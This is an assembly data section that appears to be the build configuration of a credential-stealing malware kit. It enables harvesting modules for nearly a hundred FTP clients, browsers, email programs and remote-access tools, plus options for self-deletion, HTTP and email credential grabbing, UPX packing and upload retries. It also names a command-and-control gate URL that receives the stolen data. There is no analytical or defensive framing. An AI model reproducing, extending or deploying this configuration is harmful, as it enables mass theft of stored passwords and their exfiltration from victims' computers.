.data

; Module optional compilation
COMPILE_MODULE_32BITFTP EQU 1
COMPILE_MODULE_3DFTP EQU 1
COMPILE_MODULE_ACEFTP EQU 1
COMPILE_MODULE_ALFTP EQU 1
COMPILE_MODULE_BECKY EQU 1
COMPILE_MODULE_BLAZEFTP EQU 1
COMPILE_MODULE_BROMIUM EQU 1
COMPILE_MODULE_BULLETPROOF EQU 1
COMPILE_MODULE_CERT EQU 1
COMPILE_MODULE_CHROMEPLUS EQU 1
COMPILE_MODULE_CHROMIUM EQU 1
COMPILE_MODULE_CLASSICFTP EQU 1
COMPILE_MODULE_COFFEECUPFTP EQU 1
COMPILE_MODULE_VS_DESIGNER EQU 1
COMPILE_MODULE_COMODODRAGON EQU 1
COMPILE_MODULE_COOLNOVO EQU 1
COMPILE_MODULE_COREFTP EQU 1
COMPILE_MODULE_CUTEFTP EQU 1
COMPILE_MODULE_CYBERDUCK EQU 1
COMPILE_MODULE_DELUXEFTP EQU 1
COMPILE_MODULE_DIRECTORYOPUS EQU 1
COMPILE_MODULE_DREAMWEAVER EQU 1
COMPILE_MODULE_EASYFTP EQU 1
COMPILE_MODULE_EPIC EQU 1
COMPILE_MODULE_EXPANDRIVE EQU 1
COMPILE_MODULE_FAR EQU 1
COMPILE_MODULE_FS_BROWSER EQU 1
COMPILE_MODULE_FASTTRACK EQU 1
COMPILE_MODULE_FFFTP EQU 1
COMPILE_MODULE_FILEZILLA EQU 1
COMPILE_MODULE_FIREFOX EQU 1
COMPILE_MODULE_FIREFTP EQU 1
COMPILE_MODULE_FLASHFXP EQU 1
COMPILE_MODULE_FLING EQU 1
COMPILE_MODULE_FLOCK EQU 1
COMPILE_MODULE_FREEFTP EQU 1
COMPILE_MODULE_FRESHFTP EQU 1
COMPILE_MODULE_FRIGATEFTP EQU 1
COMPILE_MODULE_FTPCOMMANDER EQU 1
COMPILE_MODULE_FTPCONTROL EQU 1
COMPILE_MODULE_FTPEXPLORER EQU 1
COMPILE_MODULE_FTPNOW EQU 1
COMPILE_MODULE_FTP_SURFER EQU 1
COMPILE_MODULE_FTPVOYAGER EQU 1
COMPILE_MODULE_FTPGETTER EQU 1
COMPILE_MODULE_FTPINFO EQU 1
COMPILE_MODULE_FTPRUSH EQU 1
COMPILE_MODULE_FTPSHELL EQU 1
COMPILE_MODULE_GLOBALDOWNLOADER EQU 1
COMPILE_MODULE_GOFTP EQU 1
COMPILE_MODULE_CHROME EQU 1
COMPILE_MODULE_INCREDIMAIL EQU 1
COMPILE_MODULE_IE EQU 1
COMPILE_MODULE_KMELEON EQU 1
COMPILE_MODULE_LEAPFTP EQU 1
COMPILE_MODULE_LEECHFTP EQU 1
COMPILE_MODULE_LINASFTP EQU 1
COMPILE_MODULE_MOZILLA EQU 1
COMPILE_MODULE_MYFTP EQU 1
COMPILE_MODULE_NETDRIVE EQU 1
COMPILE_MODULE_NETFILE EQU 1
COMPILE_MODULE_NEXUSFILE EQU 1
COMPILE_MODULE_NICHROME EQU 1
COMPILE_MODULE_NOTEPADPP EQU 1
COMPILE_MODULE_NOVAFTP EQU 1
COMPILE_MODULE_ODIN EQU 1
COMPILE_MODULE_OPERA EQU 1
COMPILE_MODULE_OUTLOOK EQU 1
COMPILE_MODULE_POCOMAIL EQU 1
COMPILE_MODULE_PUTTY EQU 1
COMPILE_MODULE_RDP EQU 1
COMPILE_MODULE_ROBOFTP EQU 1
COMPILE_MODULE_ROCKMELT EQU 1
COMPILE_MODULE_SEAMONKEY EQU 1
COMPILE_MODULE_SECUREFX EQU 1
COMPILE_MODULE_SHERRODFTP EQU 1
COMPILE_MODULE_SMARTFTP EQU 1
COMPILE_MODULE_SOFTX EQU 1
COMPILE_MODULE_STAFF EQU 1
COMPILE_MODULE_THEBAT EQU 1
COMPILE_MODULE_THUNDERBIRD EQU 1
COMPILE_MODULE_WTC EQU 1
COMPILE_MODULE_TURBOFTP EQU 1
COMPILE_MODULE_ULTRAFXP EQU 1
COMPILE_MODULE_WEBDRIVE EQU 1
COMPILE_MODULE_WEBSITEPUBLISHER EQU 1
COMPILE_MODULE_WINDOWS_LIVE_MAIL EQU 1
COMPILE_MODULE_WINDOWS_MAIL EQU 1
COMPILE_MODULE_WINFTP EQU 1
COMPILE_MODULE_WINSCP EQU 1
COMPILE_MODULE_WINZIP EQU 1
COMPILE_MODULE_WISEFTP EQU 1
COMPILE_MODULE_WS_FTP EQU 1
COMPILE_MODULE_XFTP EQU 1
COMPILE_MODULE_YANDEXINTERNET EQU 1

; Advanced options
SELF_DELETE equ 1
GRAB_HTTP equ 1
GRAB_EMAIL equ 1
USE_UPX equ 1
UPLOAD_RETRIES equ 2

; Domain list
szDomainList db "http://pkingfools.hostzi.com/Panel/gate.php",0
db 0
